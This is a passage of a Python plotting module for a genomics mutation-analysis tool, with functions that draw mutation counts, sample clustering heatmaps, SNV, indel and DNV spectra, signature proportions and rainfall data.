transform=axes[i][m].transAxes)\n score_lim_dict[mut_types_all[m]].append(score_lim)\n if plot_roc:\n axes[i][m].set_ylim(bottom=0)\n axes[i][m].set_xlim(left=0)\n axes[i][m].ticklabel_format(axis='y', style='sci', scilimits=(-2, 2))\n axes[i][m].ticklabel_format(axis='x', style='sci', scilimits=(-2, 2))\n axes[i][m].set_xlabel('false positive rate 1/Mbp ', fontsize=12)\n axes[i][m].set_ylabel('mutation rate 1/Mbp ', fontsize=12)\n # axes[i][m].grid()\n\n if plot_roc:\n if not return_string:\n __plt.show()\n __plt.close()\n return score_lim_dict, fig\n else:\n figfile = __BytesIO()\n __plt.savefig(figfile, bbox_inches='tight', format='png')\n __plt.close()\n figfile.seek(0)\n figdata_png = __base64.b64encode(figfile.getvalue())\n return score_lim_dict, figdata_png\n else:\n return score_lim_dict, None\n\n\ndef plot_mutation_counts(sample_names=None,\n 
mutations_dataframe=None,\n unique_only=False,\n return_string=False,\n mutations_filename=None,\n output_dir=None,\n control_samples=None):\n \"\"\"\n\n Plots the number of mutations found in all the samples in different ploidy regions.\n\n :param mutations_dataframe: The dataframe containing the mutations. (default: None) (pandas.DataFrame)\n :param sample_names: list of samples names to plot mutation counts for (default: None) (list of str)\n :param unique_only: If True, only unique mutations are plotted for each sample. (default: False) (boolean)\n :param return_string: If True, only a temporary plot is generated and its base64 code is returned, that can be included in HTML files. (default: False) (bool)\n :param mutations_filename: The path to the file, where mutations are stored, if the mutations attribute of the object does not exist, its value will be set to the file defined here. (default: None) (str)\n :param output_dir: the path to the directory where mutation tables are located (default: None) (str)\n :param control_samples: List of sample names that should be used as control samples in the sense, that no unique mutations are expected in them. (The sample names listed here must match a subset of the sample names listed in bam_filename.) (list of str)\n\n :returns: If the return_string value is True, a base64 encoded string of the image. Otherwise, a list of matplotlib figures.\n\n \"\"\"\n\n try:\n __sns.set(style=\"whitegrid\", font=\"DejaVu Sans\")\n except:\n pass\n\n if mutations_dataframe is not None:\n if not mutations_dataframe.__class__ == __pd.core.frame.DataFrame:\n msg = 'Error: Argument \"mutations\" is not a pandas DataFrame.'\n raise ValueError(msg)\n elif sorted(list(mutations_dataframe.columns)) != sorted(['sample_name', 'chr', 'pos', 'type', 'score',\n 'ref', 'mut', 'cov', 'mut_freq', 'cleanliness',\n 'ploidy']):\n msg = 'Error: The DataFrame supplied in argument \"mutations\" does not have the required columns.'\n msg += '\\n'\n msg += 'Make sure to have the following columns: sample_name, chr, pos, type, score, ' \\\n 'ref, mut, cov, mut_freq, cleanliness, ploidy'\n raise ValueError(msg)\n else:\n mutations_dataframe = io.load_mutations(output_dir=output_dir,\n filename=mutations_filename)\n\n if sample_names is None:\n sample_names = sorted(\n list(set([item for s in list(mutations_dataframe['sample_name'].unique()) for item in s.split(',')])))\n\n if control_samples is None:\n print('Warning: list of control samples not defined.')\n control_samples = []\n elif sum([1 for s in control_samples if s not in sample_names]) > 0:\n raise ValueError('List of \"control_samples\" is not a subset of \"sample_names\".')\n\n if unique_only:\n mutations_df = mutations_dataframe[~mutations_dataframe['sample_name'].str.contains(',')]\n else:\n mutations_df = mutations_dataframe\n\n unique_samples = sorted(sample_names)\n\n pos = list(range(len(unique_samples)))\n unique_ploidies = sorted(list(mutations_df['ploidy'].unique()))\n width = 1. 
/ (len(unique_ploidies) + 1)\n\n color_dict_base = {'control': '#008B8B',\n 'treated': '#8B008B'}\n\n color_list = [color_dict_base['control'] if s in control_samples\n else color_dict_base['treated'] for s in unique_samples]\n\n mut_types_all = ['SNV', 'INS', 'DEL']\n\n # Plotting the bars\n fig, axes = __plt.subplots(len(mut_types_all), 1)\n fig.set_size_inches(14, 6 * len(mut_types_all))\n fig.subplots_adjust(top=0.92, left=0.07, right=0.97,\n hspace=0.4, wspace=0.2)\n\n for m in range(len(mut_types_all)):\n for i in range(len(unique_ploidies)):\n filtered_table = mutations_df[\n (mutations_df['type'] == mut_types_all[m]) & (mutations_df['ploidy'] == unique_ploidies[i])]\n count_list = []\n for s in unique_samples:\n count_list.append(filtered_table[filtered_table['sample_name'].str.contains(s)].shape[0])\n sample_counts = __pd.DataFrame()\n sample_counts['sample'] = unique_samples\n sample_counts['count'] = count_list\n\n sample_counts = sample_counts.sort_values(by='sample')\n\n if len(unique_ploidies) == 1:\n a = 1\n else:\n a = 1 - (i + 1) * (1. / len(unique_ploidies))\n barlist = axes[m].bar([p + i * width for p in pos], sample_counts['count'], width, alpha=a,\n color=\"violet\", label=str(int(unique_ploidies[i])))\n for j in range(len(barlist)):\n barlist[j].set_color(color_list[j])\n\n # Set the y axis label\n axes[m].set_ylabel('Mutation count', fontsize=12)\n\n # Set the chart's title\n if unique_only and len(unique_ploidies) == 1:\n title = '\\nUnique ' + mut_types_all[m] + ' counts\\n'\n elif not unique_only and len(unique_ploidies) == 1:\n title = '\\nAll ' + mut_types_all[m] + ' counts\\n'\n elif unique_only and len(unique_ploidies) > 1:\n title = '\\nUnique ' + mut_types_all[m] + ' counts grouped by ploidy\\n'\n elif not unique_only and len(unique_ploidies) > 1:\n title = '\\nAll ' + mut_types_all[m] + ' counts grouped by ploidy\\n'\n axes[m].set_title(title, fontsize=14)\n\n # Set the position of the x ticks\n axes[m].set_xticks([p - 0.5 + len(unique_ploidies) * 1 * width for p in pos])\n # Set the labels for the x ticks\n sample_labels = ['\\n'.join([s[i:i + 10] for i in range(0, len(s), 10)]) for s in unique_samples]\n fs = 8\n axes[m].set_xticklabels(sample_labels, rotation=90, fontsize=fs)\n\n # Setting the x-axis and y-axis limits\n axes[m].set_xlim(min([p - 1 + len(unique_ploidies) * 0.5 * width for p in pos]),\n max(pos) + width * (len(unique_ploidies) + 1))\n axes[m].ticklabel_format(axis='y', style='sci', scilimits=(-2, 2))\n axes[m].set_yscale('log')\n # axes[m].grid()\n\n if return_string:\n figfile = __BytesIO()\n __plt.savefig(figfile, bbox_inches='tight', format='png')\n __plt.close()\n figfile.seek(0)\n figdata_png = __base64.b64encode(figfile.getvalue())\n return figdata_png\n\n else:\n __plt.show()\n __plt.close()\n return fig\n\n\ndef plot_hierarchical_clustering(sample_names=None,\n mutations_dataframe=None,\n mutations_filename=None,\n output_dir=None,\n return_string=False,\n method='average'):\n \"\"\"\n\n Generates a heatmap based on the number of shared mutations found in all possible sample pairs.\n A dendrogram resulting from hierarchical clustering of the samples is also added.\n\n :param mutations_dataframe: The dataframe containing the mutations. (default: None) (pandas.DataFrame)\n :param sample_names: list of sample names to include in the clustering (default: None) (list of str)\n :param return_string: If True, only a temporary plot is generated and its base64 code is returned, which can be included in HTML files. 
(default: False) (bool)\n :param mutations_filename: The path to the file, where mutations are stored, if the mutations attribute of the object does not exist, its value will be set to the file defined here. (default: None) (str)\n :param output_dir: the path to the directory where mutation tables are located (default: None) (str)\n :param method: method used for seaborn hierarchical clustering (default: 'average') (\"single\", \"complete\", \"average\", \"weighted\", \"median\", \"ward\")\n\n :returns: If the return_string value is True, a base64 encoded string of the image. Otherwise, a list of matplotlib figures.\n\n \"\"\"\n\n if mutations_dataframe is not None:\n if not mutations_dataframe.__class__ == __pd.core.frame.DataFrame:\n msg = 'Error: Argument \"mutations\" is not a pandas DataFrame.'\n raise ValueError(msg)\n elif sorted(list(mutations_dataframe.columns)) != sorted(['sample_name', 'chr', 'pos', 'type', 'score',\n 'ref', 'mut', 'cov', 'mut_freq', 'cleanliness',\n 'ploidy']):\n msg = 'Error: The DataFrame supplied in argument \"mutations\" does not have the required columns.'\n msg += '\\n'\n msg += 'Make sure to have the following columns: sample_name, chr, pos, type, score, ' \\\n 'ref, mut, cov, mut_freq, cleanliness, ploidy'\n raise ValueError(msg)\n else:\n mutations_dataframe = io.load_mutations(output_dir=output_dir,\n filename=mutations_filename)\n\n if sample_names is None:\n sample_names = sorted(\n list(set([item for s in list(mutations_dataframe['sample_name'].unique()) for item in s.split(',')])))\n\n if len(sample_names) < 3:\n raise ValueError('Hierarchical clustering cannot be performed on less than 3 samples.')\n\n c = __np.zeros((len(sample_names), len(sample_names)))\n for i in range(len(sample_names)):\n for j in range(i + 1):\n c[i][j] = mutations_dataframe[(mutations_dataframe[\"sample_name\"].str.contains(sample_names[i])) & (\n mutations_dataframe[\"sample_name\"].str.contains(sample_names[j]))].shape[0]\n c[j][i] = c[i][j]\n\n d = __pd.DataFrame(c)\n d.columns = sample_names\n d.index = sample_names\n\n g = __sns.clustermap(d, method=method, cmap=\"viridis\", robust=True);\n\n if return_string:\n figfile = __BytesIO()\n g.savefig(figfile, bbox_inches='tight', format='png')\n __plt.close()\n figfile.seek(0)\n figdata_png = __base64.b64encode(figfile.getvalue())\n return figdata_png\n else:\n __plt.show()\n __plt.close()\n return g\n\n\ndef plot_SNV_spectrum(spectrumDict,\n return_string=False, normalize_to_1=False):\n \"\"\"\n\n Plots the triplet spectrum for a list of 96-element vectors defined in spectrumDict.\n\n :param spectrumDict: a dictionary containing spectra as values and sample names as keys (dictionary)\n :param normalize_to_1: If True, results are plotted as percentages, instead of counts. (default: False) (bool)\n :param return_string: If True, only a temporary plot is generated and its base64 code is returned, that can be included in HTML files. (default: False) (bool)\n\n :returns: If the return_string value is True, a base64 encoded string of the image. 
Otherwise, a list of matplotlib figures.\n\n \"\"\"\n\n try:\n __sns.set(style=\"white\", font=\"DejaVu Sans\")\n except:\n pass\n\n all_muttypes = [\"ACAA\", \"TGTT\", \"ACCA\", \"GGTT\", \"ACGA\", \"CGTT\", \"ACTA\", \"AGTT\", \"CCAA\", \"TGGT\",\n \"CCCA\", \"GGGT\", \"CCGA\", \"CGGT\", \"CCTA\", \"AGGT\", \"GCAA\", \"TGCT\", \"GCCA\", \"GGCT\",\n \"GCGA\", \"CGCT\", \"GCTA\", \"AGCT\", \"TCAA\", \"TGAT\", \"TCCA\", \"GGAT\", \"TCGA\", \"CGAT\",\n \"TCTA\", \"AGAT\", \"ACAG\", \"TGTC\", \"ACCG\", \"GGTC\", \"ACGG\", \"CGTC\", \"ACTG\", \"AGTC\",\n \"CCAG\", \"TGGC\", \"CCCG\", \"GGGC\", \"CCGG\", \"CGGC\", \"CCTG\", \"AGGC\", \"GCAG\", \"TGCC\",\n \"GCCG\", \"GGCC\", \"GCGG\", \"CGCC\", \"GCTG\", \"AGCC\", \"TCAG\", \"TGAC\", \"TCCG\", \"GGAC\",\n \"TCGG\", \"CGAC\", \"TCTG\", \"AGAC\", \"ACAT\", \"TGTA\", \"ACCT\", \"GGTA\", \"ACGT\", \"CGTA\",\n \"ACTT\", \"AGTA\", \"CCAT\", \"TGGA\", \"CCCT\", \"GGGA\", \"CCGT\", \"CGGA\", \"CCTT\", \"AGGA\",\n \"GCAT\", \"TGCA\", \"GCCT\", \"GGCA\", \"GCGT\", \"CGCA\", \"GCTT\", \"AGCA\", \"TCAT\", \"TGAA\",\n \"TCCT\", \"GGAA\", \"TCGT\", \"CGAA\", \"TCTT\", \"AGAA\", \"ATAA\", \"TATT\", \"ATCA\", \"GATT\",\n \"ATGA\", \"CATT\", \"ATTA\", \"AATT\", \"CTAA\", \"TAGT\", \"CTCA\", \"GAGT\", \"CTGA\", \"CAGT\",\n \"CTTA\", \"AAGT\", \"GTAA\", \"TACT\", \"GTCA\", \"GACT\", \"GTGA\", \"CACT\", \"GTTA\", \"AACT\",\n \"TTAA\", \"TAAT\", \"TTCA\", \"GAAT\", \"TTGA\", \"CAAT\", \"TTTA\", \"AAAT\", \"ATAC\", \"TATG\",\n \"ATCC\", \"GATG\", \"ATGC\", \"CATG\", \"ATTC\", \"AATG\", \"CTAC\", \"TAGG\", \"CTCC\", \"GAGG\",\n \"CTGC\", \"CAGG\", \"CTTC\", \"AAGG\", \"GTAC\", \"TACG\", \"GTCC\", \"GACG\", \"GTGC\", \"CACG\",\n \"GTTC\", \"AACG\", \"TTAC\", \"TAAG\", \"TTCC\", \"GAAG\", \"TTGC\", \"CAAG\", \"TTTC\", \"AAAG\",\n \"ATAG\", \"TATC\", \"ATCG\", \"GATC\", \"ATGG\", \"CATC\", \"ATTG\", \"AATC\", \"CTAG\", \"TAGC\",\n \"CTCG\", \"GAGC\", \"CTGG\", \"CAGC\", \"CTTG\", \"AAGC\", \"GTAG\", \"TACC\", \"GTCG\", \"GACC\",\n \"GTGG\", \"CACC\", \"GTTG\", \"AACC\", \"TTAG\", \"TAAC\", \"TTCG\", \"GAAC\", \"TTGG\", \"CAAC\",\n \"TTTG\", \"AAAC\"]\n\n mut_xlabel = [i[0] + i[1] + i[2] for i in all_muttypes[::2]]\n mut_title = ['C > A', 'C > G', 'C > T', 'T > A', 'T > C', 'T > G']\n\n ind = __np.arange(16)\n width = 0.4\n\n spectrum_colors = []\n spectrum_colors.append('#03bcee')\n spectrum_colors.append('#010101')\n spectrum_colors.append('#e32926')\n spectrum_colors.append('#999999')\n spectrum_colors.append('#a1ce63')\n spectrum_colors.append('#ebc6c4')\n\n figs = []\n\n for sample_name, spectrum_orig in spectrumDict.items():\n\n if normalize_to_1:\n spectrum = __np.array(spectrum_orig) / __np.sum(spectrum_orig)\n else:\n spectrum = spectrum_orig\n\n f, axarr = __plt.subplots(1, 6, sharey=True)\n f.set_size_inches(20, 3)\n\n for i in range(6):\n axarr[i].bar(ind, spectrum[i * 16:(i + 1) * 16], width, color=spectrum_colors[i],\n edgecolor=spectrum_colors[i])\n axarr[i].xaxis.set_ticks(__np.linspace(0, 16, 17))\n axarr[i].set_xticks(ind + width)\n axarr[i].xaxis.set_tick_params(size=0)\n axarr[i].yaxis.set_tick_params(size=0)\n axarr[i].set_xticklabels(mut_xlabel[i * 16:(i + 1) * 16], rotation='vertical', size=9)\n axarr[i].text(0.5, 1.08, mut_title[i], size=12, ha=\"center\", transform=axarr[i].transAxes)\n\n axarr[i].add_patch(\n __Rectangle((0, 1.01), 1, 0.05, color=spectrum_colors[i], transform=axarr[i].transAxes,\n clip_on=False))\n axarr[i].spines['right'].set_visible(False)\n axarr[i].spines['top'].set_visible(False)\n axarr[i].set_ylim(0, max(spectrum) * 
1.1)\n if i == 0:\n axarr[i].set_ylabel(sample_name + '\\n', fontsize=12)\n if i != 0:\n axarr[i].spines['left'].set_visible(False)\n\n if normalize_to_1:\n vals = axarr[0].get_yticks()\n axarr[0].set_yticklabels(['{:,.1%}'.format(x) for x in vals])\n\n if return_string:\n figfile = __BytesIO()\n f.savefig(figfile, bbox_inches='tight', format='png')\n __plt.close()\n figfile.seek(0)\n figdata_png = __base64.b64encode(figfile.getvalue())\n figs.append(figdata_png)\n else:\n __plt.show()\n figs.append(f)\n __plt.close(f)\n\n return figs\n\n\ndef plot_indel_spectrum(spectrumDict, return_string=False, normalize_to_1=False):\n \"\"\"\n\n Plots the indel spectrum, given a dictionary containing 83-element vectors as values.\n\n :param spectrumDict: a dictionary containing spectra as values and sample names as keys (dictionary)\n :param normalize_to_1: If True, results are plotted as percentages instead of counts. (default: False) (bool)\n :param return_string: If True, only a temporary plot is generated and its base64 code is returned, which can be included in HTML files. (default: False) (bool)\n\n :returns: If the return_string value is True, a base64 encoded string of the image. Otherwise, a list of matplotlib figures.\n\n \"\"\"\n try:\n __sns.set(style=\"white\", font=\"DejaVu Sans\")\n except:\n pass\n\n mut_xlabel = ['1', '2', '3', '4', '5', '6+'] * 2 + ['0', '1', '2', '3', '4', '5+'] * 2\n mut_xlabel += ['1', '2', '3', '4', '5', '6+'] * 4 + ['0', '1', '2', '3', '4', '5+'] * 4\n mut_xlabel += ['1', '1', '2', '1', '2', '3', '1', '2', '3', '4', '5+']\n\n mut_title = ['C', 'T', 'C', 'T'] + ['2', '3', '4', '5+'] * 3\n\n subplot_sizes = [6] * 12 + [1, 2, 3, 5]\n width = 0.4\n\n spectrum_colors = ['#fdbe6f', '#ff8001', '#b0dd8b', '#36a12e',\n '#fdcab5', '#fc8a6a', '#f14432', '#bc141a',\n '#d0e1f2', '#94c4df', '#4a98c9', '#1764ab',\n '#e2e2ef', '#b6b6d8', '#8683bd', '#61409b']\n\n text_color = ['black', 'white', 'black', 'white'] + ['black', 'black', 'black', 'white'] * 3\n\n figs = []\n\n for sample_name, spectrum_orig in spectrumDict.items():\n if __np.sum(spectrum_orig) == 0:\n print('No indels were found in sample ' + sample_name)\n else:\n if normalize_to_1:\n id_spectrum = __np.array(spectrum_orig) / __np.sum(spectrum_orig)\n else:\n id_spectrum = spectrum_orig\n\n f, axarr = __plt.subplots(1, len(subplot_sizes), sharey=True, gridspec_kw={'width_ratios': subplot_sizes})\n f.set_size_inches(20, 3)\n\n for i in range(len(subplot_sizes)):\n ind = __np.arange(subplot_sizes[i])\n start_pos = int(__np.sum(subplot_sizes[:i]))\n end_pos = start_pos + subplot_sizes[i]\n axarr[i].bar(ind, id_spectrum[start_pos:end_pos], width, color=spectrum_colors[i],\n edgecolor=spectrum_colors[i])\n axarr[i].xaxis.set_ticks(__np.linspace(0, subplot_sizes[i], subplot_sizes[i] + 1))\n axarr[i].set_xticks(ind + width)\n axarr[i].xaxis.set_tick_params(size=0)\n axarr[i].yaxis.set_tick_params(size=0)\n axarr[i].set_xticklabels(mut_xlabel[start_pos:end_pos], rotation='horizontal', size=9)\n axarr[i].text(0.5, 1.05, mut_title[i], size=12, ha=\"center\", transform=axarr[i].transAxes,\n color=text_color[i])\n\n 
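# The colored category strip above each panel is drawn as a Rectangle in axes\n # coordinates (y > 1 places it above the plotting area); clip_on=False keeps it visible.\n 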
axarr[i].add_patch(\n __Rectangle((0, 1.03), 1, 0.08, color=spectrum_colors[i], transform=axarr[i].transAxes,\n clip_on=False))\n\n axarr[i].spines['right'].set_visible(False)\n axarr[i].spines['top'].set_visible(False)\n axarr[i].set_ylim(0, max(id_spectrum) * 1.1)\n if i == 0:\n axarr[i].set_ylabel(sample_name + '\\n', fontsize=12)\n if i != 0:\n axarr[i].spines['left'].set_visible(False)\n\n if normalize_to_1:\n vals = axarr[0].get_yticks()\n axarr[0].set_yticklabels(['{:,.1%}'.format(x) for x in vals])\n\n axarr[0].text(1.1, 1.2, \"1 bp deletion\", size=14, ha=\"center\", transform=axarr[0].transAxes)\n axarr[0].text(1.1, -0.2, \"homopolymer length\", size=13, ha=\"center\", transform=axarr[0].transAxes)\n axarr[2].text(1.1, 1.2, \"1 bp insertion\", size=14, ha=\"center\", transform=axarr[2].transAxes)\n axarr[2].text(1.1, -0.2, \"homopolymer length\", size=13, ha=\"center\", transform=axarr[2].transAxes)\n axarr[5].text(1.1, 1.2, \">1 bp deletions at repeats\\n(deletion length)\", size=14, ha=\"center\",\n transform=axarr[5].transAxes)\n axarr[5].text(1.1, -0.2, \"number of repeat units\", size=13, ha=\"center\", transform=axarr[5].transAxes)\n axarr[9].text(1.1, 1.2, \">1 bp insertions at repeats\\n(insertion length)\", size=14, ha=\"center\",\n transform=axarr[9].transAxes)\n axarr[9].text(1.1, -0.2, \"number of repeat units\", size=13, ha=\"center\", transform=axarr[9].transAxes)\n axarr[14].text(0.7, 1.2, \"deletions with microhomology\\n(deletion length)\", size=14, ha=\"center\",\n transform=axarr[14].transAxes)\n axarr[14].text(0.7, -0.2, \"microhomology length\", size=13, ha=\"center\", transform=axarr[14].transAxes)\n\n if return_string:\n figfile = __BytesIO()\n f.savefig(figfile, bbox_inches='tight', format='png')\n __plt.close()\n figfile.seek(0)\n figdata_png = __base64.b64encode(figfile.getvalue())\n figs.append(figdata_png)\n else:\n __plt.show()\n figs.append(f)\n __plt.close(f)\n\n return figs\n\n\ndef plot_DNV_heatmap(matrixDict, return_string=False, normalize_to_1=False):\n \"\"\"\n\n Plot DNVs (dinucleotide variations) as a heatmap for a database of mutations.\n\n :param matrixDict: a dictionary containing 12x12 element matrices as values and sample names as keys (dictionary)\n :param return_string: If True, only a temporary plot is generated and its base64 code is returned, that can be included in HTML files. (default: False) (bool)\n :param normalize_to_1: If True, results are plotted as percentages, instead of counts. (default: False) (bool)\n\n :returns: If the return_string value is True, a base64 encoded string of the image. 
Otherwise, a list of matplotlib figures.\n\n \"\"\"\n\n base_changes = ['C>A', 'C>G', 'C>T', 'T>A', 'T>C', 'T>G', 'A>C', 'A>G', 'A>T', 'G>A', 'G>C', 'G>T']\n\n figs = []\n\n for sample_name, matrix in matrixDict.items():\n\n if __np.sum(matrix) == 0:\n print('No DNVs were found in sample ' + sample_name)\n else:\n if normalize_to_1:\n matrix_to_plot = matrix / __np.sum(matrix)\n else:\n matrix_to_plot = matrix\n df_m = __pd.DataFrame(matrix_to_plot, columns=base_changes, index=base_changes)\n colormap = __plt.cm.YlGnBu\n mask = __np.zeros_like(matrix_to_plot)\n for i in range(mask.shape[0]):\n for j in range(mask.shape[1]):\n if i >= mask.shape[0] - j:\n mask[i, j] = True\n with __sns.axes_style(\"white\"):\n if not normalize_to_1:\n ax = __sns.heatmap(df_m, square=True, mask=mask, cmap=colormap, annot=True)\n else:\n ax = __sns.heatmap(df_m, square=True, mask=mask, cmap=colormap, annot=False)\n\n __plt.xlabel(\"\\n3' base change\", fontsize=14)\n __plt.ylabel(\"5' base change\\n\", fontsize=14)\n __plt.title(sample_name + '\\n', fontsize=16)\n\n if return_string:\n figfile = __BytesIO()\n __plt.savefig(figfile, bbox_inches='tight', format='png')\n __plt.close()\n figfile.seek(0)\n figdata_png = __base64.b64encode(figfile.getvalue())\n figs.append(figdata_png)\n\n else:\n f = __plt.gcf()\n figs.append(f)\n __plt.show()\n __plt.close()\n\n return figs\n\n\ndef plot_DNV_spectrum(spectrumDict, return_string=False, normalize_to_1=False):\n \"\"\"\n\n Plots the DNV spectrum, given a dictionary containing the spectra as values.\n\n :param spectrumDict: a dictionary containing DNV spectra as values and sample names as keys (dictionary)\n :param normalize_to_1: If True, results are plotted as percentages instead of counts. (default: False) (bool)\n :param return_string: If True, only a temporary plot is generated and its base64 code is returned, which can be included in HTML files. (default: False) (bool)\n\n :returns: If the return_string value is True, a base64 encoded string of the image. 
Otherwise, a list of matplotlib figures.\n\n \"\"\"\n try:\n __sns.set(style=\"white\", font=\"DejaVu Sans\")\n except:\n pass\n\n DBS_types = [\"AC>CA\", \"AC>CG\", \"AC>CT\", \"AC>GA\", \"AC>GG\", \"AC>GT\", \"AC>TA\", \"AC>TG\", \"AC>TT\",\n \"AT>CA\", \"AT>CC\", \"AT>CG\", \"AT>GA\", \"AT>GC\", \"AT>TA\",\n \"CC>AA\", \"CC>AG\", \"CC>AT\", \"CC>GA\", \"CC>GG\", \"CC>GT\", \"CC>TA\", \"CC>TG\", \"CC>TT\",\n \"CG>AT\", \"CG>GC\", \"CG>GT\", \"CG>TA\", \"CG>TC\", \"CG>TT\",\n \"CT>AA\", \"CT>AC\", \"CT>AG\", \"CT>GA\", \"CT>GC\", \"CT>GG\", \"CT>TA\", \"CT>TC\", \"CT>TG\",\n \"GC>AA\", \"GC>AG\", \"GC>AT\", \"GC>CA\", \"GC>CG\", \"GC>TA\",\n \"TA>AT\", \"TA>CG\", \"TA>CT\", \"TA>GC\", \"TA>GG\", \"TA>GT\",\n \"TC>AA\", \"TC>AG\", \"TC>AT\", \"TC>CA\", \"TC>CG\", \"TC>CT\", \"TC>GA\", \"TC>GG\", \"TC>GT\",\n \"TG>AA\", \"TG>AC\", \"TG>AT\", \"TG>CA\", \"TG>CC\", \"TG>CT\", \"TG>GA\", \"TG>GC\", \"TG>GT\",\n \"TT>AA\", \"TT>AC\", \"TT>AG\", \"TT>CA\", \"TT>CC\", \"TT>CG\", \"TT>GA\", \"TT>GC\", \"TT>GG\"]\n\n mut_xlabel = [k.split('>')[1] for k in DBS_types]\n mut_title = ['AC>NN', 'AT>NN', 'CC>NN', 'CG>NN', 'CT>NN', 'GC>NN', 'TA>NN', 'TC>NN', 'TG>NN', 'TT>NN']\n\n subplot_sizes = [9, 6, 9, 6, 9, 6, 6, 9, 9, 9]\n width = 0.4\n\n spectrum_colors = ['#a6cee3', '#1f78b4', '#b2df8a', '#33a02c', '#fb9a99',\n '#e31a1c', '#fdbf6f', '#ff7f00', '#cab2d6', '#6a3d9a']\n\n figs = []\n\n for sample_name, spectrum_orig in spectrumDict.items():\n if __np.sum(spectrum_orig) == 0:\n print('No DNVs were found in sample ' + sample_name)\n else:\n if normalize_to_1:\n spectrum = __np.array(spectrum_orig) / __np.sum(spectrum_orig)\n else:\n spectrum = spectrum_orig\n\n f, axarr = __plt.subplots(1, len(subplot_sizes), sharey=True, gridspec_kw={'width_ratios': subplot_sizes})\n f.set_size_inches(20, 3)\n\n for i in range(len(subplot_sizes)):\n ind = __np.arange(subplot_sizes[i])\n start_pos = int(__np.sum(subplot_sizes[:i]))\n end_pos = start_pos + subplot_sizes[i]\n axarr[i].bar(ind, spectrum[start_pos:end_pos], width, color=spectrum_colors[i],\n edgecolor=spectrum_colors[i])\n axarr[i].xaxis.set_ticks(__np.linspace(0, subplot_sizes[i], subplot_sizes[i] + 1))\n axarr[i].set_xticks(ind + width)\n axarr[i].xaxis.set_tick_params(size=0)\n axarr[i].yaxis.set_tick_params(size=0)\n axarr[i].set_xticklabels(mut_xlabel[start_pos:end_pos], rotation='vertical', size=9)\n axarr[i].text(0.5, 1.08, mut_title[i], size=12, ha=\"center\", transform=axarr[i].transAxes)\n\n axarr[i].add_patch(\n __Rectangle((0, 1.01), 1, 0.05, color=spectrum_colors[i], transform=axarr[i].transAxes,\n clip_on=False))\n axarr[i].spines['right'].set_visible(False)\n axarr[i].spines['top'].set_visible(False)\n axarr[i].set_ylim(0, max(spectrum) * 1.1)\n if i == 0:\n axarr[i].set_ylabel(sample_name + '\\n', fontsize=12)\n if i != 0:\n axarr[i].spines['left'].set_visible(False)\n\n if normalize_to_1:\n vals = axarr[0].get_yticks()\n axarr[0].set_yticklabels(['{:,.1%}'.format(x) for x in vals])\n\n if return_string:\n figfile = __BytesIO()\n f.savefig(figfile, bbox_inches='tight', format='png')\n __plt.close()\n figfile.seek(0)\n figdata_png = __base64.b64encode(figfile.getvalue())\n figs.append(figdata_png)\n else:\n __plt.show()\n figs.append(f)\n __plt.close(f)\n\n try:\n 
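# Best-effort restore of the default whitegrid style; silently skipped if seaborn styling fails.\n 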
__sns.set_style(\"whitegrid\")\n except:\n pass\n\n return figs\n\n\ndef __plot_spectrum_decomposition(sample_names, theta_matrix, sig_names, spectrum_type=None):\n \"\"\"\n\n Plot the final set of proportions for the signatures.\n\n :param sample_names: The list of sample names analysed. (list of str)\n :param theta_matrix: The final set of mixture proportions for each sample. (numpy.array)\n :param sig_names: The names of the signatures. (numpy.array)\n :param spectrum_type: The type of mutations analysed (\"SNV\", \"DNV\", \"indel\"). (default: None) (str)\n\n \"\"\"\n\n try:\n __sns.set_style(\"white\")\n except:\n pass\n\n ind = __np.arange(len(sig_names))\n width = 0.4\n\n c = '#a6cee3'\n\n if spectrum_type == 'DNV':\n c = '#b2df8a'\n elif spectrum_type == 'SNV':\n c = '#fdbf6f'\n elif spectrum_type == 'indel':\n c = '#cab2d6'\n\n figs = []\n\n for sID, sample_name in enumerate(sample_names):\n f, ax = __plt.subplots()\n f.set_size_inches(20, 3)\n\n ax.bar(ind, theta_matrix[sID], width, color=c, edgecolor=c)\n ax.xaxis.set_ticks(__np.linspace(0, len(sig_names), len(sig_names) + 1))\n ax.set_xticks(ind)\n ax.xaxis.set_tick_params(size=0)\n ax.yaxis.set_tick_params(size=0)\n ax.set_xticklabels(sig_names, rotation='vertical', size=12)\n\n ax.spines['right'].set_visible(False)\n ax.spines['top'].set_visible(False)\n ax.set_ylim(0, 1)\n ax.set_ylabel(sample_name + '\\n', fontsize=12)\n\n vals = ax.get_yticks()\n ax.set_yticklabels(['{:,.0%}'.format(x) for x in vals])\n\n for vID, v in enumerate(theta_matrix[sID]):\n if (v > 0):\n if (len(sig_names) < 25):\n ax.text(ind[vID], v + 0.05, str(round(v * 100, 2)) + '%', size=10, horizontalalignment='center')\n else:\n ax.text(ind[vID], v + 0.05, str(round(v * 100, 2)) + '%', size=10,\n rotation='vertical', horizontalalignment='center',\n verticalalignment='bottom')\n\n __plt.show()\n figs.append(f)\n __plt.close(f)\n\n return figs\n\n\ndef __get_rainfall_data_for_sample(mutations_dataframe, chromosomes, chrom_length):\n \"\"\"\n\n :param mutations_dataframe: a pandas DataFrame containing mutations (pandas.DataFrame)\n :param chromosomes: a list of chromosomes for the genome (list of str)\n :param chrom_length: a list of chromosome lengths (list of int)\n\n :returns: a dictionary containing points to plot for each mutation type\n\n \"\"\"\n mutation_types = ['C > A', 'G > T', 'C > G', 'G > C', 'C > T', 'G > A', 'T > A', 'A > T', 'T > C', 'A > G', 'T > G',\n 'A > C']\n\n mutation_type_dict = {i: [] for i in range(8)}\n\n for chrom in list(mutations_dataframe['chr'].unique()):\n abs_chrom_pos = sum(chrom_length[:chromosomes.index(chrom)])\n if mutations_dataframe[mutations_dataframe['chr'] == chrom].shape[0] > 1:\n pos_before = -42\n for rID, r in mutations_dataframe[mutations_dataframe['chr'] == chrom].sort_values(by='pos').iterrows():\n if pos_before != -42:\n if r['type'] == 'SNV':\n muttype = int(__np.floor(mutation_types.index(r['ref'] + ' > ' + r['mut']) / 2))\n elif r['type'] == 'INS':\n muttype = 6\n elif r['type'] == 'DEL':\n muttype = 7\n mutation_type_dict[muttype].append([abs_chrom_pos + r['pos'], r['pos'] - pos_before])\n pos_before = r['pos']\n\n return mutation_type_dict\n\n\ndef plot_rainfall(mutations_dataframe,\n chromosomes=None, chrom_length=None, ref_fasta=None,\n sample_names=None,\n return_string=False,\n muttypes=['SNV', 'INS', 'DEL'],\n unique_only=True,\n plot_range=None):\n \"\"\"\n\n Plot a rainfall plot of the mutations. 
